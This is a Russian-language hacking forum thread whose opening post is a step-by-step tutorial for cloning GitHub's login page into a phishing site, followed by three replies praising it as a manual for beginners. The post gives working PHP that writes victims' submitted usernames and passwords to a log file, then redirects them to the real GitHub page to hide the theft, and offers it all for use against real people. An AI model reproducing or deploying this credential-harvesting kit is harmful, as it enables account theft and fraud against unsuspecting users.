Перейти к публикации

4ik4ik

Свой фишинг

Рекомендованные сообщения

Привет. Ловите хакинг)

За пару минут мы научимся делать  фишинг с абсолютно любого сайта, страницы.  Думаю понятия слова фишинг вы и в сети найдете. Сразу же перейдем к делу:

Для начала выбираем сайт, фейк которого вы хотите создать.Я буду рассматривать на примере гитхаба. Находим страницу с авторизацией.

29884553_m.png

Что бы скомуниздить страницу юзайте https://webparse.ru/

При реге обязательно запросит почту, регаем временную почту на temp-mail. После регистрации в графе домена вводим адрес той страницы, которую будет дублировать.

29884562_m.png

После завершения копирования , вам на мыло придёт ссылка на скачивание архива с готовой страницей.

Приступаем к второму этапу

Чтобы эта страница ожила и приносила необходимый нам результат. Ищем  параметр action, нам нужно его изменить:

29884587_m.png

Делаем замену на auth.php

На скриншоте этот параметр уже изменён.

Теперь в папке с html файлом создаём auth.php и папку base

29884603_m.png

Открываем auth.php в любом удобном для вас кодовом редакторе я например юзаю Sublime Text 2  и добавляем следующий код:

<?php file_put_contents('base/ds_logs.txt', "Username: ".$_POST['login']." Password: ".$_POST['password'].'\n', FILE_APPEND); ?>

"file_put_contents" функция служит для записи данных в файл, "base/ds_logs.txt" - путь к файлу, где сохранятся пароли, "FILE_APPEND" - указывает на то, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.

Грузим с изменениями на хостинг. Права ставим 777.

29884678_m.jpg

Заходим на сайт для проверки и вводим данные, они будут сохранены по ссылке: вашдомен.com/base/ds_logs.txt

Названия папки вы сможете сменить. 

Всё ок, пароли сохраняются, но после попытки авторизоваться ничего не происходит, поэтому добавим в auth.php следующее:

header('Location: https://github.com/session');

После ввода логина и пароля жертву перебросит на оригинальный сайт авторизации, тем временем нам сразу придут данные жертвы, которые запишутся в файлик.

Для простого фишинга этих манипуляций вполне достаточно, если сильно заморочится можно сделать админку. 
Думаю, что это кому-то будет полезным 

Поделиться сообщением


Ссылка на сообщение

Мне понравилось. все очень доступно написано 

Поделиться сообщением


Ссылка на сообщение

Ручками по факту будет гораздо лучше (это я про копирование) но для новичков очень годный мануал

Поделиться сообщением


Ссылка на сообщение
3 часа назад, TeamKill сказал:

Ручками по факту будет гораздо лучше (это я про копирование) но для новичков очень годный мануал

конечно, копировать  только ручками. для первоходов как раз в яблочко 

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×
×
  • Создать...